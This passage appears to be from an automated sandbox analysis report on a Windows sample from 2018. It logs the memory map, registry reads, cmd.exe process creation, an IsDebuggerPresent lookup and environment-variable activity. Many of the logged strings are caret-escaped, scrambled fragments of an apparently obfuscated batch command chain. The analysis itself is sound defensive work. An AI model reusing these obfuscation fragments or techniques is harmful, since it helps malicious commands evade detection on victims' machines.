| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (60)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Open | STD_OUTPUT_HANDLE | - |
|
35 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 13 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb70, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb78, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:15 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 124488 |
|
1 |
Environment (121)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
2 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^ |
|
1 | |
| Get Environment String | name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^ |
|
1 | |
| Get Environment String | name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^ |
|
1 | |
| Get Environment String | name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^ |
|
1 | |
| Get Environment String | name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^ |
|
1 | |
| Get Environment String | name = R^en6w^L^P^j^y^{^7^y^jU^6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^ |
|
1 | |
| Get Environment String | name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^ |
|
1 | |
| Get Environment String | name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^ |
|
1 | |
| Get Environment String | name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^ |
|
1 | |
| Get Environment String | name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^ |
|
1 | |
| Get Environment String | name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^ |
|
1 | |
| Get Environment String | name = ^w^L^]^6^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^ |
|
1 | |
| Get Environment String | name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^ |
|
1 | |
| Get Environment String | name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^ |
|
1 | |
| Get Environment String | name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^ |
|
1 | |
| Get Environment String | name = ^!) , )&& ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^ |
|
1 | |
| Get Environment String | name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O , |
|
1 | |
| Get Environment String | name = ^*^[^-^, |
|
1 | |
| Get Environment String | name = | |
|
1 | |
| Get Environment String | name = +~}{, result_out = eo28PGC7y.Y.Yeo2vTd]F3pbf6K'.Y1.Y@eo2h8PZ7y8P3pTde37{jUnPjy+@eo2%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112eo22+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3QeACh8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Keo22+2eo28Pm3QeAC3p`2+2qF3pbfN6m8P.YAC67jh`eo2GC7y8Pm'jU]62+242+2Zn.AC67[2+2F3pbfbfk7yuuQe37eo22+26KF3p].Yjh`eo2GC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3QeAC7yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371AC62+272+2%zwLhGC7yGC7yk7yeo28 ,.,.Zm6.2+28Peo24ax'Zm.3QeACX2+27',X2+2m,.AC ,.F3pjUn,.2+2.6GC7y4axuQe7yeo2K_X'2+2k7yn.AC672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3QeAC2+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37eo2'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3QeAC6n37jUn5):jUnbf)-3QeACX]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3QeAC6n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`eo2GC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+2AC (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL12AC6726xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyACiy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Yeo28P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3QeAC3p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Peo27yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 eo23Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLReo2h8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3QeAC`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6Xmeo2GC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o |
|
1 | |
| Get Environment String | name = \,}_, result_out = eo28PGC7y.Y.Yeo2vTd]F3pbf6K'.Y1.Y@eo2h8PZ7y8P3pTde37{jUnPjy+@eo2%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112eo22+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3Qe9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Keo22+2eo28Pm3Qe93p`2+2qF3pbfN6m8P.Y967jh`eo2GC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQe37eo22+26KF3p].Yjh`eo2GC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3Qe97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7yeo28 ,.,.Zm6.2+28Peo24ax'Zm.3Qe9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQe7yeo2K_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3Qe92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37eo2'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3Qe96n37jUn5):jUnbf)-3Qe9X]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3Qe96n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`eo2GC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Yeo28P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3Qe93p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Peo27yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 eo23Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLReo2h8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3Qe9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6Xmeo2GC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o |
|
1 | |
| Get Environment String | name = `?, result_out = s8PGC7y.Y.YsvTd]F3pbf6K'.Y1.Y@sh8PZ7y8P3pTde37{jUnPjy+@s%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112s2+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3Qe9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Ks2+2s8Pm3Qe93p`2+2qF3pbfN6m8P.Y967jh`sGC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQe37s2+26KF3p].Yjh`sGC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3Qe97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,.,.Zm6.2+28Ps4ax'Zm.3Qe9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQe7ysK_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3Qe92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3Qe96n37jUn5):jUnbf)-3Qe9X]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3Qe96n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Ys8P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3Qe93p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Ps7yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLRsh8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3Qe9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o |
|
1 | |
| Get Environment String | name = @[~, result_out = s8PGC7y.Y.YsvTd]F3pbf6K'.Y1.Y@sh8PZ7y8P3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2).Y112s2+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3QI9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Ks2+2s8Pm3QI93p`2+2qF3pbfN6m8P.Y967jh`sGC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQI37s2+26KF3p].Yjh`sGC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3QI97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,.,.Zm6.2+28Ps4ax'Zm.3QI9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQI7ysK_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3QI92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wL.Y-3QI96n37.YjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6II'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Ys8P%.Y.Y6jUI/`6KwL,%zwLhPj.Y1.Z.YF3pbf6RI7K3QI93p8P8 